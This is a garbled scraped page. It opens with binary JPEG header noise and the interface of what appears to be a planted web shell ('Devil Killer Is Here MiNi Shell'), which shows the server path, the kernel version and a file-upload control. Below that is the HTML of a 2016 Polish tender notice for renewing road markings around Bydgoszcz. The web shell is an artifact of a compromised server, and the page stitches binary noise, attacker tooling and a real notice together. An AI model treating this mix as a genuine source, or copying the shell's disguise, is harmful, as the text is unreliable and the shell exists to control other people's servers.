JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160408/82050-N-2016.html

<p class="kh_header"><b>Bydgoszcz: Odnowienie oznakowania poziomego nawierzchni bitumicznych dróg Zarządu Dróg Wojewódzkich w Bydgoszczy w 2016r. z podziałem na 6 części</b><br>
<b>Numer ogłoszenia: 82050 - 2016; data zamieszczenia: 08.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowienie oznakowania poziomego nawierzchni bitumicznych dróg Zarządu Dróg Wojewódzkich w Bydgoszczy w 2016r. z podziałem na 6 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Odnowienie oznakowania poziomego nawierzchni bitumicznych dróg Zarządu Dróg Wojewódzkich w Bydgoszczy w 2016r.                    z podziałem na 6 części
Zamówieniem objęto drogi wojewódzkie Zarządu Dróg Wojewódzkich w Bydgoszczy:
Łącznie długość dróg - 1 728,985 km
2. Zamówienie podzielono na 6 części, z których każda jest oddzielnym postępowaniem:
a) cz. I - RDW Inowrocław
b) cz. II - RDW Toruń
c) cz. III - RDW Tuchola
d) cz. IV - RDW Wąbrzeźno
e) cz. V - RDW Włocławek
f) cz. VI - RDW Żołędowo 
W ramach każdej części Zamawiający wydzielił 2 etapy realizacji zamówienia, szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- malowanie linii na skrzyżowaniach i przejściach dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych zastosowaniem kulek odblaskowych
- malowanie strzałek i innych symboli cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
- frezowanie istniejącego malowania poziomego 
- malowanie grubowarstwowe chemoutwardzalne, gładkie linii segregacyjnych           i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych 
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych, strzałek i innych symboli  oraz linii na skrzyżowaniach i przejść dla pieszych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych na istniejącym, zanikającym oznakowaniu grubowarstwowym
Odnowienie oznakowania poziomego należy wykonać zgodnie z istniejącym projektem organizacji ruchu, który zostanie udostępniony Wykonawcy po podpisaniu umowy, a przed podpisaniem umowy dostępny jest do wglądu we właściwych miejscowo Rejonach Dróg Wojewódzkich. 
Zestawienie linii, przejść dla pieszych i piktogramów z lokalizacją zostanie przekazane Wykonawcy po podpisaniu umowy i przed przekazaniem terenu. 
4. Zamawiający zaleca zainteresowanym Wykonawcom przed złożeniem oferty w niniejszym postępowaniu dokonanie wizji w terenie oraz porównanie z dokumentacją przetargową. Koszty dokonania wizji w terenie ponosi  w całości Wykonawca. Każdy oferent ponosi pełną odpowiedzialność za treść uzyskanej informacji.
5. Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.
6. Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z późn. zm.) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego .
7. Wykonawca zobowiązany jest prowadzić malowanie w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie  z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia. Przedmiot i zakres zamówienia podstawowego obejmuje wszystkie drogi wojewódzkiej administrowane przez Zarząd Dróg Wojewódzkich w Bydgoszczy. Zamawiający przewiduje zatem możliwość zwiększenia ilości powierzchni malowania w takiej samej technologii jak została przewidziana w pkt. III.3 niniejszej SIWZ na wszystkich drogach wojewódzkich administrowanych przez ZDW w Bydgoszczy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy posiadający wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca w celu spełnienia  warunku musi wykazać, że wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej  dwa zamówienia na wykonanie malowania poziomego nawierzchni o wartości nie mniejszej niż 30 000,00 zł brutto każde w ostatnich  5 latach przed upływem terminu składania ofert a jeżeli okres prowadzenia jest krótszy - w tym okresie.
Wykonawca, który złoży ofertę na więcej niż jedną część, może w każdej ofercie wykazać tą samą wiedzę i doświadczenie, tzn. wykazać te same roboty budowlane  w wykazie głównych robót budowlanych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy dysponującym odpowiednim potencjałem technicznym. Wykonawca w celu spełnienia warunku musi wykazać, iż dysponuje:
- malowarką samojezdną - 1 szt. 
- malowarką pchaną do malowania małych powierzchni - szt. 1 
lub sprzętem równoważnym, pozwalającym na prawidłowe wykonanie przedmiotu zamówienia. 
Wykonawca, który złoży ofertę na więcej niż jedną część, musi w każdej ofercie wykazać osobny potencjał zgodnie z wymaganiami podanymi powyżej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O wykonanie zamówienia mogą ubiegać się wykonawcy dysponujący następującymi osobami zdolnymi do wykonania zamówienia:
- Kierownik budowy - 1 osoba posiadająca uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności.
Wykonawca, który złoży ofertę na więcej niż jedną część, musi w każdej ofercie  wykazać osobny potencjał zgodnie z wymaganiami podanymi powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty, których dotyczy obowiązek załączenia dowodów Zamawiający rozumie roboty, o których mowa w pkt. III.3.2 ogłoszenia, tj.  co najmniej  dwa zamówienia na wykonanie malowania poziomego nawierzchni o wartości nie mniejszej niż 30 000,00 zł brutto każde w ostatnich  5 latach przed upływem terminu składania ofert a jeżeli okres prowadzenia jest krótszy - w tym okresie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.  Odnośnie terminów wystawienia niniejszego dokumentu stosuje się odpowiednio wymagania określone w pkt. III.4.3.1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Gwarancja - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze Istotnych Postanowień Umowy będącej załącznikiem nr 10 do SIWZ, co Wykonawca potwierdza w formularzu oferty.
2. Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokona-no wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
2.1. Zmiana terminu realizacji zamówienia w przypadku: 
a) warunki atmosferyczne odbiegające od typowych (np. długotrwałe, obfite deszcze, niskie temperatury w dzień i w nocy, przymrozki i inne), uniemożliwiające wykonanie przedmiotu zamówienia zgodnie z SST;
b) zlecania przez Zamawiającego prac dodatkowych jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;  
c) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia    terminowe zakończenie realizacji przedmiotu umowy;
d) zaistnieje siła wyższa
2.2.  	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę pod wykonawcy, wprowadzenie nowego  lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji robót.  Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach które-go Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. 
2.3. Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy,   a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
2.4. Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych  w treści umowy.
2.5.	Zmiany wynagrodzenia w przypadku zmiany:
a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
3.Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 Ustawy z dnia 23 kwietnia 1964r. - Kodeks cywilny (T. j. - Dz.U. z 2014r. poz. 121 z późn. zm.) - Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy
4. Przekształcenia Wykonawcy będącego osoba prawną lub spółka osobowa lub cywilną w inna spółkę prawa handlowego w trybie przekształcenia spółki zgodnie z przepisami Ustawy z dnia 15 września 2000r. - Kodeks spółek handlowych (T. j. - Dz. U. z 2013r., poz. 1030 z późn. zm.).
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdw-bydgoszcz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Inowrocławiu
ul. Budowlana 40
88-100 Inowrocław
Pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 08:45, miejsce: Rejon Dróg Wojewódzkich w Inowrocławiu
ul. Budowlana 40
88-100 Inowrocław
Pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RDW Inowrocław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówieniem objęto drogi wojewódzkie administrowane przez RDW Inowrocław
W ramach części Zamawiający wydzielił 2 etapy realizacji zamówienia,                 szczegółowy przedmiar dotyczący każdego etapu znajduje się w kosztorysach  ofertowych właściwych dla danego etapu.
3. Zamówienie obejmuje następujący zakres robót 
- oczyszczenie nawierzchni przed malowaniem
- trasowanie malowanych powierzchni,
- malowanie linii segregacyjnych i krawędziowych ciągłych i przerywanych cienkowarstwowo farbami chlorokauczukowymi z zastosowaniem kulek odblaskowych
